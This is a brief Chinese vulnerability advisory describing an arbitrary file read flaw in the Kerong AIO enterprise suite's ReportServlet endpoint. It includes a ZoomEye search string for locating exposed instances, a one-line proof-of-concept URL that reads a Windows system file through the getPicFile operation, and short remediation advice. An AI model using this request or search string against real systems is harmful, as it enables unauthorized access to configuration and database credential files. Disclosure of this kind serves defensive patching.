0x01 产品简介

科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP（进销存财务）、OAOA（办公⾃动化）、CRMCRM（客⼾关系管理）、UDPUDP（⾃定义平台），集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。

0x02 漏洞概述

科荣AIO ReportServlet 接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

钟馗之眼："changeAccount('8000')"

0x04 漏洞复现

PoC

http://your-ip/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini

0x05 修复建议 

关闭互联网暴露面或接口设置访问权限

升级至安全版本